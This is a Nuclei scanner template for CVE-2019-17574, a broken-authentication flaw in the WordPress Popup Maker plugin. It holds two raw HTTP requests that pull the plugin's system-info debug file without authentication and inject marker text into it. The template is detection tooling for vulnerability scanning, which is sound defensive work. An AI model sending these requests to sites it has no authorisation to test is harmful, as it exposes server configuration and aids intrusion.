61 lines
2.3 KiB
YAML
61 lines
2.3 KiB
YAML
id: CVE-2019-17574
|
|
|
|
info:
|
|
name: Popup-Maker < 1.8.12 - Broken Authentication
|
|
author: DhiyaneshDK
|
|
severity: critical
|
|
description: |
|
|
An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the "support debug text file").
|
|
impact: |
|
|
Unauthenticated attackers can gain administrative access to the WordPress site.
|
|
remediation: |
|
|
Update Popup-Maker plugin to version 1.8.12 or later.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/9907
|
|
- https://web.archive.org/web/20191128065954/https://blog.redyops.com/wordpress-plugin-popup-maker/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-17574
|
|
- https://github.com/PopupMaker/Popup-Maker/blob/master/CHANGELOG.md
|
|
- https://wpvulndb.com/vulnerabilities/9907
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
|
|
cvss-score: 9.1
|
|
cve-id: 'CVE-2019-17574'
|
|
cwe-id: CWE-639
|
|
epss-score: 0.12974
|
|
epss-percentile: 0.95024
|
|
cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: code-atlantic
|
|
product: popup_maker
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/plugins/popup-maker/"
|
|
tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /?pum_action=tools_page_tab_system_info HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
popmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_1
|
|
words:
|
|
- 'Popup Maker Configuration'
|
|
- 'Webserver Configuration'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- 'CVE-2019-17574'
|
|
# digest: 4a0a0047304502201cb7a532725f7804448ffc27f5f766edf3676e258b055224261a99d5047c48880221008ee525f52b9b04dc5b281d401e426a6c3519187ae7fa418713b6b6135c6ddc48:922c64590222798bb761d5b6d8e72950 |